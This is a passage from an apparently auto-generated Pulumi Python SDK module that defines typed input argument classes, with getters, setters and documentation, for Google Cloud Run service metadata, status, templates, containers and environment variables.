info: http://kubernetes.io/docs/user-guide/annotations
**Note**: The Cloud Run API may add additional annotations that were not provided in your config.
If the provider plan shows a diff where a server-side annotation is added, you can add it to your config
or apply the lifecycle.ignore_changes rule to the metadata.0.annotations field.
Cloud Run (fully managed) uses the following annotation keys to configure features on a Service:
- `run.googleapis.com/ingress` sets the [ingress settings](https://cloud.google.com/sdk/gcloud/reference/run/deploy#--ingress)
for the Service. For example, `"run.googleapis.com/ingress" = "all"`.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def generation(self) -> Optional[pulumi.Input[int]]:
"""
-
A sequence number representing a specific generation of the desired state.
"""
return pulumi.get(self, "generation")
@generation.setter
def generation(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "generation", value)
@property
@pulumi.getter
def labels(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Map of string keys and values that can be used to organize and categorize
(scope and select) objects. May match selectors of replication controllers
and routes.
More info: http://kubernetes.io/docs/user-guide/labels
"""
return pulumi.get(self, "labels")
@labels.setter
def labels(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "labels", value)
@property
@pulumi.getter
def namespace(self) -> Optional[pulumi.Input[str]]:
"""
In Cloud Run the namespace must be equal to either the
project ID or project number.
"""
return pulumi.get(self, "namespace")
@namespace.setter
def namespace(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "namespace", value)
@property
@pulumi.getter(name="resourceVersion")
def resource_version(self) -> Optional[pulumi.Input[str]]:
"""
-
An opaque value that represents the internal version of this object that
can be used by clients to determine when objects have changed. May be used
for optimistic concurrency, change detection, and the watch operation on a
resource or set of resources. They may only be valid for a
particular resource or set of resources.
More info:
https://git.k8s.io/community/contributors/devel/api-conventions.md#concurrency-control-and-consistency
"""
return pulumi.get(self, "resource_version")
@resource_version.setter
def resource_version(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_version", value)
@property
@pulumi.getter(name="selfLink")
def self_link(self) -> Optional[pulumi.Input[str]]:
"""
-
SelfLink is a URL representing this object.
"""
return pulumi.get(self, "self_link")
@self_link.setter
def self_link(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "self_link", value)
@property
@pulumi.getter
def uid(self) -> Optional[pulumi.Input[str]]:
"""
-
UID is a unique id generated by the server on successful creation of a resource and is not
allowed to change on PUT operations.
More info: http://kubernetes.io/docs/user-guide/identifiers#uids
"""
return pulumi.get(self, "uid")
@uid.setter
def uid(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "uid", value)
@pulumi.input_type
class ServiceStatusArgs:
def __init__(__self__, *,
conditions: Optional[pulumi.Input[Sequence[pulumi.Input['ServiceStatusConditionArgs']]]] = None,
latest_created_revision_name: Optional[pulumi.Input[str]] = None,
latest_ready_revision_name: Optional[pulumi.Input[str]] = None,
observed_generation: Optional[pulumi.Input[int]] = None,
url: Optional[pulumi.Input[str]] = None):
if conditions is not None:
pulumi.set(__self__, "conditions", conditions)
if latest_created_revision_name is not None:
pulumi.set(__self__, "latest_created_revision_name", latest_created_revision_name)
if latest_ready_revision_name is not None:
pulumi.set(__self__, "latest_ready_revision_name", latest_ready_revision_name)
if observed_generation is not None:
pulumi.set(__self__, "observed_generation", observed_generation)
if url is not None:
pulumi.set(__self__, "url", url)
@property
@pulumi.getter
def conditions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ServiceStatusConditionArgs']]]]:
return pulumi.get(self, "conditions")
@conditions.setter
def conditions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ServiceStatusConditionArgs']]]]):
pulumi.set(self, "conditions", value)
@property
@pulumi.getter(name="latestCreatedRevisionName")
def latest_created_revision_name(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "latest_created_revision_name")
@latest_created_revision_name.setter
def latest_created_revision_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "latest_created_revision_name", value)
@property
@pulumi.getter(name="latestReadyRevisionName")
def latest_ready_revision_name(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "latest_ready_revision_name")
@latest_ready_revision_name.setter
def latest_ready_revision_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "latest_ready_revision_name", value)
@property
@pulumi.getter(name="observedGeneration")
def observed_generation(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "observed_generation")
@observed_generation.setter
def observed_generation(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "observed_generation", value)
@property
@pulumi.getter
def url(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "url")
@url.setter
def url(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "url", value)
@pulumi.input_type
class ServiceStatusConditionArgs:
def __init__(__self__, *,
message: Optional[pulumi.Input[str]] = None,
reason: Optional[pulumi.Input[str]] = None,
status: Optional[pulumi.Input[str]] = None,
type: Optional[pulumi.Input[str]] = None):
if message is not None:
pulumi.set(__self__, "message", message)
if reason is not None:
pulumi.set(__self__, "reason", reason)
if status is not None:
pulumi.set(__self__, "status", status)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def message(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "message")
@message.setter
def message(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "message", value)
@property
@pulumi.getter
def reason(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "reason")
@reason.setter
def reason(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "reason", value)
@property
@pulumi.getter
def status(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "status")
@status.setter
def status(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "status", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "type", value)
@pulumi.input_type
class ServiceTemplateArgs:
def __init__(__self__, *,
metadata: Optional[pulumi.Input['ServiceTemplateMetadataArgs']] = None,
spec: Optional[pulumi.Input['ServiceTemplateSpecArgs']] = None):
"""
:param pulumi.Input['ServiceTemplateMetadataArgs'] metadata: Metadata associated with this Service, including name, namespace, labels,
and annotations.
Structure is documented below.
:param pulumi.Input['ServiceTemplateSpecArgs'] spec: RevisionSpec holds the desired state of the Revision (from the client).
Structure is documented below.
"""
if metadata is not None:
pulumi.set(__self__, "metadata", metadata)
if spec is not None:
pulumi.set(__self__, "spec", spec)
@property
@pulumi.getter
def metadata(self) -> Optional[pulumi.Input['ServiceTemplateMetadataArgs']]:
"""
Metadata associated with this Service, including name, namespace, labels,
and annotations.
Structure is documented below.
"""
return pulumi.get(self, "metadata")
@metadata.setter
def metadata(self, value: Optional[pulumi.Input['ServiceTemplateMetadataArgs']]):
pulumi.set(self, "metadata", value)
@property
@pulumi.getter
def spec(self) -> Optional[pulumi.Input['ServiceTemplateSpecArgs']]:
"""
RevisionSpec holds the desired state of the Revision (from the client).
Structure is documented below.
"""
return pulumi.get(self, "spec")
@spec.setter
def spec(self, value: Optional[pulumi.Input['ServiceTemplateSpecArgs']]):
pulumi.set(self, "spec", value)
@pulumi.input_type
class ServiceTemplateMetadataArgs:
def __init__(__self__, *,
annotations: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
generation: Optional[pulumi.Input[int]] = None,
labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
name: Optional[pulumi.Input[str]] = None,
namespace: Optional[pulumi.Input[str]] = None,
resource_version: Optional[pulumi.Input[str]] = None,
self_link: Optional[pulumi.Input[str]] = None,
uid: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] annotations: Annotations is a key value map stored with a resource that
may be set by external tools to store and retrieve arbitrary metadata. More
info: http://kubernetes.io/docs/user-guide/annotations
**Note**: The Cloud Run API may add additional annotations that were not provided in your config.
If the provider plan shows a diff where a server-side annotation is added, you can add it to your config
or apply the lifecycle.ignore_changes rule to the metadata.0.annotations field.
Cloud Run (fully managed) uses the following annotation keys to configure features on a Service:
- `run.googleapis.com/ingress` sets the [ingress settings](https://cloud.google.com/sdk/gcloud/reference/run/deploy#--ingress)
for the Service. For example, `"run.googleapis.com/ingress" = "all"`.
:param pulumi.Input[int] generation: -
A sequence number representing a specific generation of the desired state.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] labels: Map of string keys and values that can be used to organize and categorize
(scope and select) objects. May match selectors of replication controllers
and routes.
More info: http://kubernetes.io/docs/user-guide/labels
:param pulumi.Input[str] name: Volume's name.
:param pulumi.Input[str] namespace: In Cloud Run the namespace must be equal to either the
project ID or project number.
:param pulumi.Input[str] resource_version: -
An opaque value that represents the internal version of this object that
can be used by clients to determine when objects have changed. May be used
for optimistic concurrency, change detection, and the watch operation on a
resource or set of resources. They may only be valid for a
particular resource or set of resources.
More info:
https://git.k8s.io/community/contributors/devel/api-conventions.md#concurrency-control-and-consistency
:param pulumi.Input[str] self_link: -
SelfLink is a URL representing this object.
:param pulumi.Input[str] uid: -
UID is a unique id generated by the server on successful creation of a resource and is not
allowed to change on PUT operations.
More info: http://kubernetes.io/docs/user-guide/identifiers#uids
"""
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if generation is not None:
pulumi.set(__self__, "generation", generation)
if labels is not None:
pulumi.set(__self__, "labels", labels)
if name is not None:
pulumi.set(__self__, "name", name)
if namespace is not None:
pulumi.set(__self__, "namespace", namespace)
if resource_version is not None:
pulumi.set(__self__, "resource_version", resource_version)
if self_link is not None:
pulumi.set(__self__, "self_link", self_link)
if uid is not None:
pulumi.set(__self__, "uid", uid)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Annotations is a key value map stored with a resource that
may be set by external tools to store and retrieve arbitrary metadata. More
info: http://kubernetes.io/docs/user-guide/annotations
**Note**: The Cloud Run API may add additional annotations that were not provided in your config.
If the provider plan shows a diff where a server-side annotation is added, you can add it to your config
or apply the lifecycle.ignore_changes rule to the metadata.0.annotations field.
Cloud Run (fully managed) uses the following annotation keys to configure features on a Service:
- `run.googleapis.com/ingress` sets the [ingress settings](https://cloud.google.com/sdk/gcloud/reference/run/deploy#--ingress)
for the Service. For example, `"run.googleapis.com/ingress" = "all"`.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def generation(self) -> Optional[pulumi.Input[int]]:
"""
-
A sequence number representing a specific generation of the desired state.
"""
return pulumi.get(self, "generation")
@generation.setter
def generation(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "generation", value)
@property
@pulumi.getter
def labels(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Map of string keys and values that can be used to organize and categorize
(scope and select) objects. May match selectors of replication controllers
and routes.
More info: http://kubernetes.io/docs/user-guide/labels
"""
return pulumi.get(self, "labels")
@labels.setter
def labels(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "labels", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Volume's name.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def namespace(self) -> Optional[pulumi.Input[str]]:
"""
In Cloud Run the namespace must be equal to either the
project ID or project number.
"""
return pulumi.get(self, "namespace")
@namespace.setter
def namespace(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "namespace", value)
@property
@pulumi.getter(name="resourceVersion")
def resource_version(self) -> Optional[pulumi.Input[str]]:
"""
-
An opaque value that represents the internal version of this object that
can be used by clients to determine when objects have changed. May be used
for optimistic concurrency, change detection, and the watch operation on a
resource or set of resources. They may only be valid for a
particular resource or set of resources.
More info:
https://git.k8s.io/community/contributors/devel/api-conventions.md#concurrency-control-and-consistency
"""
return pulumi.get(self, "resource_version")
@resource_version.setter
def resource_version(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_version", value)
@property
@pulumi.getter(name="selfLink")
def self_link(self) -> Optional[pulumi.Input[str]]:
"""
-
SelfLink is a URL representing this object.
"""
return pulumi.get(self, "self_link")
@self_link.setter
def self_link(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "self_link", value)
@property
@pulumi.getter
def uid(self) -> Optional[pulumi.Input[str]]:
"""
-
UID is a unique id generated by the server on successful creation of a resource and is not
allowed to change on PUT operations.
More info: http://kubernetes.io/docs/user-guide/identifiers#uids
"""
return pulumi.get(self, "uid")
@uid.setter
def uid(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "uid", value)
@pulumi.input_type
class ServiceTemplateSpecArgs:
def __init__(__self__, *,
container_concurrency: Optional[pulumi.Input[int]] = None,
containers: Optional[pulumi.Input[Sequence[pulumi.Input['ServiceTemplateSpecContainerArgs']]]] = None,
service_account_name: Optional[pulumi.Input[str]] = None,
serving_state: Optional[pulumi.Input[str]] = None,
timeout_seconds: Optional[pulumi.Input[int]] = None,
volumes: Optional[pulumi.Input[Sequence[pulumi.Input['ServiceTemplateSpecVolumeArgs']]]] = None):
"""
:param pulumi.Input[int] container_concurrency: ContainerConcurrency specifies the maximum allowed in-flight (concurrent)
requests per container of the Revision. Values are:
:param pulumi.Input[Sequence[pulumi.Input['ServiceTemplateSpecContainerArgs']]] containers: Container defines the unit of execution for this Revision.
In the context of a Revision, we disallow a number of the fields of
this Container, including: name, ports, and volumeMounts.
The runtime contract is documented here:
https://github.com/knative/serving/blob/master/docs/runtime-contract.md
Structure is documented below.
:param pulumi.Input[str] service_account_name: Email address of the IAM service account associated with the revision of the
service. The service account represents the identity of the running revision,
and determines what permissions the revision has. If not provided, the revision
will use the project's default service account.
:param pulumi.Input[str] serving_state: -
ServingState holds a value describing the state the resources
are in for this Revision.
It is expected
that the system will manipulate this based on routability and load.
:param pulumi.Input[int] timeout_seconds: TimeoutSeconds holds the max duration the instance is allowed for responding to a request.
:param pulumi.Input[Sequence[pulumi.Input['ServiceTemplateSpecVolumeArgs']]] volumes: Volume represents a named volume in a container.
Structure is documented below.
"""
if container_concurrency is not None:
pulumi.set(__self__, "container_concurrency", container_concurrency)
if containers is not None:
pulumi.set(__self__, "containers", containers)
if service_account_name is not None:
pulumi.set(__self__, "service_account_name", service_account_name)
if serving_state is not None:
warnings.warn("""Not supported by Cloud Run fully managed""", DeprecationWarning)
pulumi.log.warn("""serving_state is deprecated: Not supported by Cloud Run fully managed""")
if serving_state is not None:
pulumi.set(__self__, "serving_state", serving_state)
if timeout_seconds is not None:
pulumi.set(__self__, "timeout_seconds", timeout_seconds)
if volumes is not None:
pulumi.set(__self__, "volumes", volumes)
@property
@pulumi.getter(name="containerConcurrency")
def container_concurrency(self) -> Optional[pulumi.Input[int]]:
"""
ContainerConcurrency specifies the maximum allowed in-flight (concurrent)
requests per container of the Revision. Values are:
"""
return pulumi.get(self, "container_concurrency")
@container_concurrency.setter
def container_concurrency(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "container_concurrency", value)
@property
@pulumi.getter
def containers(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ServiceTemplateSpecContainerArgs']]]]:
"""
Container defines the unit of execution for this Revision.
In the context of a Revision, we disallow a number of the fields of
this Container, including: name, ports, and volumeMounts.
The runtime contract is documented here:
https://github.com/knative/serving/blob/master/docs/runtime-contract.md
Structure is documented below.
"""
return pulumi.get(self, "containers")
@containers.setter
def containers(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ServiceTemplateSpecContainerArgs']]]]):
pulumi.set(self, "containers", value)
@property
@pulumi.getter(name="serviceAccountName")
def service_account_name(self) -> Optional[pulumi.Input[str]]:
"""
Email address of the IAM service account associated with the revision of the
service. The service account represents the identity of the running revision,
and determines what permissions the revision has. If not provided, the revision
will use the project's default service account.
"""
return pulumi.get(self, "service_account_name")
@service_account_name.setter
def service_account_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "service_account_name", value)
@property
@pulumi.getter(name="servingState")
def serving_state(self) -> Optional[pulumi.Input[str]]:
"""
-
ServingState holds a value describing the state the resources
are in for this Revision.
It is expected
that the system will manipulate this based on routability and load.
"""
return pulumi.get(self, "serving_state")
@serving_state.setter
def serving_state(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "serving_state", value)
@property
@pulumi.getter(name="timeoutSeconds")
def timeout_seconds(self) -> Optional[pulumi.Input[int]]:
"""
TimeoutSeconds holds the max duration the instance is allowed for responding to a request.
"""
return pulumi.get(self, "timeout_seconds")
@timeout_seconds.setter
def timeout_seconds(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "timeout_seconds", value)
@property
@pulumi.getter
def volumes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ServiceTemplateSpecVolumeArgs']]]]:
"""
Volume represents a named volume in a container.
Structure is documented below.
"""
return pulumi.get(self, "volumes")
@volumes.setter
def volumes(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ServiceTemplateSpecVolumeArgs']]]]):
pulumi.set(self, "volumes", value)
@pulumi.input_type
class ServiceTemplateSpecContainerArgs:
def __init__(__self__, *,
image: pulumi.Input[str],
args: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
commands: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
env_froms: Optional[pulumi.Input[Sequence[pulumi.Input['ServiceTemplateSpecContainerEnvFromArgs']]]] = None,
envs: Optional[pulumi.Input[Sequence[pulumi.Input['ServiceTemplateSpecContainerEnvArgs']]]] = None,
ports: Optional[pulumi.Input[Sequence[pulumi.Input['ServiceTemplateSpecContainerPortArgs']]]] = None,
resources: Optional[pulumi.Input['ServiceTemplateSpecContainerResourcesArgs']] = None,
volume_mounts: Optional[pulumi.Input[Sequence[pulumi.Input['ServiceTemplateSpecContainerVolumeMountArgs']]]] = None,
working_dir: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] image: Docker image name. This is most often a reference to a container located
in the container registry, such as gcr.io/cloudrun/hello
More info: https://kubernetes.io/docs/concepts/containers/images
:param pulumi.Input[Sequence[pulumi.Input[str]]] args: Arguments to the entrypoint.
The docker image's CMD is used if this is not provided.
Variable references $(VAR_NAME) are expanded using the container's
environment. If a variable cannot be resolved, the reference in the input
string will be unchanged. The $(VAR_NAME) syntax can be escaped with a
double $$, ie: $$(VAR_NAME). Escaped references will never be expanded,
regardless of whether the variable exists or not.
More info:
https://kubernetes.io/docs/tasks/inject-data-application/define-command-argument-container/#running-a-command-in-a-shell
:param pulumi.Input[Sequence[pulumi.Input[str]]] commands: Entrypoint array. Not executed within a shell.
The docker image's ENTRYPOINT is used if this is not provided.
Variable references $(VAR_NAME) are expanded using the container's
environment. If a variable cannot be resolved, the reference in the input
string will be unchanged. The $(VAR_NAME) syntax can be escaped with a
double $$, ie: $$(VAR_NAME). Escaped references will never be expanded,
regardless of whether the variable exists or not.
More info:
https://kubernetes.io/docs/tasks/inject-data-application/define-command-argument-container/#running-a-command-in-a-shell
:param pulumi.Input[Sequence[pulumi.Input['ServiceTemplateSpecContainerEnvFromArgs']]] env_froms: -
(Optional, Deprecated)
List of sources to populate environment variables in the container.
All invalid keys will be reported as an event when the container is starting.
When a key exists in multiple sources, the value associated with the last source will
take precedence. Values defined by an Env with a duplicate key will take
precedence.
Structure is documented below.
:param pulumi.Input[Sequence[pulumi.Input['ServiceTemplateSpecContainerEnvArgs']]] envs: List of environment variables to set in the container.
Structure is documented below.
:param pulumi.Input[Sequence[pulumi.Input['ServiceTemplateSpecContainerPortArgs']]] ports: List of open ports in the container.
More Info:
https://cloud.google.com/run/docs/reference/rest/v1/RevisionSpec#ContainerPort
Structure is documented below.
:param pulumi.Input['ServiceTemplateSpecContainerResourcesArgs'] resources: Compute Resources required by this container. Used to set values such as max memory
More info:
https://kubernetes.io/docs/concepts/configuration/manage-resources-containers/#requests-and-limits
Structure is documented below.
:param pulumi.Input[Sequence[pulumi.Input['ServiceTemplateSpecContainerVolumeMountArgs']]] volume_mounts: Volume to mount into the container's filesystem.
Only supports SecretVolumeSources.
Structure is documented below.
:param pulumi.Input[str] working_dir: -
(Optional, Deprecated)
Container's working directory.
If not specified, the container runtime's default will be used, which
might be configured in the container image.
"""
pulumi.set(__self__, "image", image)
if args is not None:
pulumi.set(__self__, "args", args)
if commands is not None:
pulumi.set(__self__, "commands", commands)
if env_froms is not None:
warnings.warn("""Not supported by Cloud Run fully managed""", DeprecationWarning)
pulumi.log.warn("""env_froms is deprecated: Not supported by Cloud Run fully managed""")
if env_froms is not None:
pulumi.set(__self__, "env_froms", env_froms)
if envs is not None:
pulumi.set(__self__, "envs", envs)
if ports is not None:
pulumi.set(__self__, "ports", ports)
if resources is not None:
pulumi.set(__self__, "resources", resources)
if volume_mounts is not None:
pulumi.set(__self__, "volume_mounts", volume_mounts)
if working_dir is not None:
warnings.warn("""Not supported by Cloud Run fully managed""", DeprecationWarning)
pulumi.log.warn("""working_dir is deprecated: Not supported by Cloud Run fully managed""")
if working_dir is not None:
pulumi.set(__self__, "working_dir", working_dir)
@property
@pulumi.getter
def image(self) -> pulumi.Input[str]:
"""
Docker image name. This is most often a reference to a container located
in the container registry, such as gcr.io/cloudrun/hello
More info: https://kubernetes.io/docs/concepts/containers/images
"""
return pulumi.get(self, "image")
@image.setter
def image(self, value: pulumi.Input[str]):
pulumi.set(self, "image", value)
@property
@pulumi.getter
def args(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Arguments to the entrypoint.
The docker image's CMD is used if this is not provided.
Variable references $(VAR_NAME) are expanded using the container's
environment. If a variable cannot be resolved, the reference in the input
string will be unchanged. The $(VAR_NAME) syntax can be escaped with a
double $$, ie: $$(VAR_NAME). Escaped references will never be expanded,
regardless of whether the variable exists or not.
More info:
https://kubernetes.io/docs/tasks/inject-data-application/define-command-argument-container/#running-a-command-in-a-shell
"""
return pulumi.get(self, "args")
@args.setter
def args(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "args", value)
@property
@pulumi.getter
def commands(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Entrypoint array. Not executed within a shell.
The docker image's ENTRYPOINT is used if this is not provided.
Variable references $(VAR_NAME) are expanded using the container's
environment. If a variable cannot be resolved, the reference in the input
string will be unchanged. The $(VAR_NAME) syntax can be escaped with a
double $$, ie: $$(VAR_NAME). Escaped references will never be expanded,
regardless of whether the variable exists or not.
More info:
https://kubernetes.io/docs/tasks/inject-data-application/define-command-argument-container/#running-a-command-in-a-shell
"""
return pulumi.get(self, "commands")
@commands.setter
def commands(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "commands", value)
@property
@pulumi.getter(name="envFroms")
def env_froms(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ServiceTemplateSpecContainerEnvFromArgs']]]]:
"""
-
(Optional, Deprecated)
List of sources to populate environment variables in the container.
All invalid keys will be reported as an event when the container is starting.
When a key exists in multiple sources, the value associated with the last source will
take precedence. Values defined by an Env with a duplicate key will take
precedence.
Structure is documented below.
"""
return pulumi.get(self, "env_froms")
@env_froms.setter
def env_froms(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ServiceTemplateSpecContainerEnvFromArgs']]]]):
pulumi.set(self, "env_froms", value)
@property
@pulumi.getter
def envs(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ServiceTemplateSpecContainerEnvArgs']]]]:
"""
List of environment variables to set in the container.
Structure is documented below.
"""
return pulumi.get(self, "envs")
@envs.setter
def envs(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ServiceTemplateSpecContainerEnvArgs']]]]):
pulumi.set(self, "envs", value)
@property
@pulumi.getter
def ports(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ServiceTemplateSpecContainerPortArgs']]]]:
"""
List of open ports in the container.
More Info:
https://cloud.google.com/run/docs/reference/rest/v1/RevisionSpec#ContainerPort
Structure is documented below.
"""
return pulumi.get(self, "ports")
@ports.setter
def ports(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ServiceTemplateSpecContainerPortArgs']]]]):
pulumi.set(self, "ports", value)
@property
@pulumi.getter
def resources(self) -> Optional[pulumi.Input['ServiceTemplateSpecContainerResourcesArgs']]:
"""
Compute Resources required by this container. Used to set values such as max memory
More info:
https://kubernetes.io/docs/concepts/configuration/manage-resources-containers/#requests-and-limits
Structure is documented below.
"""
return pulumi.get(self, "resources")
@resources.setter
def resources(self, value: Optional[pulumi.Input['ServiceTemplateSpecContainerResourcesArgs']]):
pulumi.set(self, "resources", value)
@property
@pulumi.getter(name="volumeMounts")
def volume_mounts(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ServiceTemplateSpecContainerVolumeMountArgs']]]]:
"""
Volume to mount into the container's filesystem.
Only supports SecretVolumeSources.
Structure is documented below.
"""
return pulumi.get(self, "volume_mounts")
@volume_mounts.setter
def volume_mounts(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ServiceTemplateSpecContainerVolumeMountArgs']]]]):
pulumi.set(self, "volume_mounts", value)
@property
@pulumi.getter(name="workingDir")
def working_dir(self) -> Optional[pulumi.Input[str]]:
"""
-
(Optional, Deprecated)
Container's working directory.
If not specified, the container runtime's default will be used, which
might be configured in the container image.
"""
return pulumi.get(self, "working_dir")
@working_dir.setter
def working_dir(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "working_dir", value)
@pulumi.input_type
class ServiceTemplateSpecContainerEnvArgs:
def __init__(__self__, *,
name: Optional[pulumi.Input[str]] = None,
value: Optional[pulumi.Input[str]] = None,
value_from: Optional[pulumi.Input['ServiceTemplateSpecContainerEnvValueFromArgs']] = None):
"""
:param pulumi.Input[str] name: Volume's name.
:param pulumi.Input[str] value: Variable references $(VAR_NAME) are expanded
using the previous defined environment variables in the container and
any route environment variables. If a variable cannot be resolved,
the reference in the input string will be unchanged. The $(VAR_NAME)
syntax can be escaped with a double $$, ie: $$(VAR_NAME). Escaped
references will never be expanded, regardless of whether the variable
exists or not.
Defaults to "".
:param pulumi.Input['ServiceTemplateSpecContainerEnvValueFromArgs'] value_from: Source for the environment variable's value. Only supports secret_key_ref.
Structure is documented below.
"""
if name is not None:
pulumi.set(__self__, "name", name)
if value is not None:
pulumi.set(__self__, "value", value)
if value_from is not None:
pulumi.set(__self__, "value_from", value_from)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Volume's name.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def value(self) -> Optional[pulumi.Input[str]]:
"""
Variable references $(VAR_NAME) are expanded
using the previous defined environment variables in the container and
any route environment variables. If a variable cannot be resolved,
the reference in the input string will be unchanged. The $(VAR_NAME)
syntax can be escaped with a double $$, ie: $$(VAR_NAME). Escaped
references will never be expanded, regardless of whether the variable
exists or not.
Defaults to "".
"""
return pulumi.get(self, "value")
@value.setter
def value(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "value", value)
@property
@pulumi.getter(name="valueFrom")
def value_from(self) -> Optional[pulumi.Input['ServiceTemplateSpecContainerEnvValueFromArgs']]:
"""
Source for the environment variable's value. Only supports secret_key_ref.
Structure is documented below.
"""
return pulumi.get(self, "value_from")
@value_from.setter
def value_from(self, value: Optional[pulumi.Input['ServiceTemplateSpecContainerEnvValueFromArgs']]):
pulumi.set(self, "value_from", value)
@pulumi.input_type
class ServiceTemplateSpecContainerEnvFromArgs:
def __init__(__self__, *,
config_map_ref: Optional[pulumi.Input['ServiceTemplateSpecContainerEnvFromConfigMapRefArgs']] = None,
prefix: Optional[pulumi.Input[str]] = None,
secret_ref: Optional[pulumi.Input['ServiceTemplateSpecContainerEnvFromSecretRefArgs']] = None):
"""
:param pulumi.Input['ServiceTemplateSpecContainerEnvFromConfigMapRefArgs'] config_map_ref: The ConfigMap to select from.
Structure is documented below.
:param pulumi.Input[str] prefix: An optional identifier to prepend to each key in the ConfigMap.
:param pulumi.Input['ServiceTemplateSpecContainerEnvFromSecretRefArgs'] secret_ref: The Secret to select from.
Structure is documented below.
"""
if config_map_ref is not None:
pulumi.set(__self__, "config_map_ref", config_map_ref)
if prefix is not None:
pulumi.set(__self__, "prefix", prefix)
if secret_ref is not None:
pulumi.set(__self__, "secret_ref", secret_ref)
@property
@pulumi.getter(name="configMapRef")
def config_map_ref(self) -> Optional[pulumi.Input['ServiceTemplateSpecContainerEnvFromConfigMapRefArgs']]:
"""
The ConfigMap to select from.
Structure is documented below.
"""
return pulumi.get(self, "config_map_ref")
@config_map_ref.setter
def config_map_ref(self, value: Optional[pulumi.Input['ServiceTemplateSpecContainerEnvFromConfigMapRefArgs']]):
pulumi.set(self, "config_map_ref", value)
@property
@pulumi.getter
def prefix(self) -> Optional[pulumi.Input[str]]:
"""
An optional identifier to prepend to each key in the ConfigMap.
"""
return pulumi.get(self, "prefix")
@prefix.setter
def prefix(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "prefix", value)
@property
@pulumi.getter(name="secretRef")
def secret_ref(self) -> Optional[pulumi.Input['ServiceTemplateSpecContainerEnvFromSecretRefArgs']]:
"""
The Secret to select from.
Structure is documented below.
"""
return pulumi.get(self, "secret_ref")
@secret_ref.setter
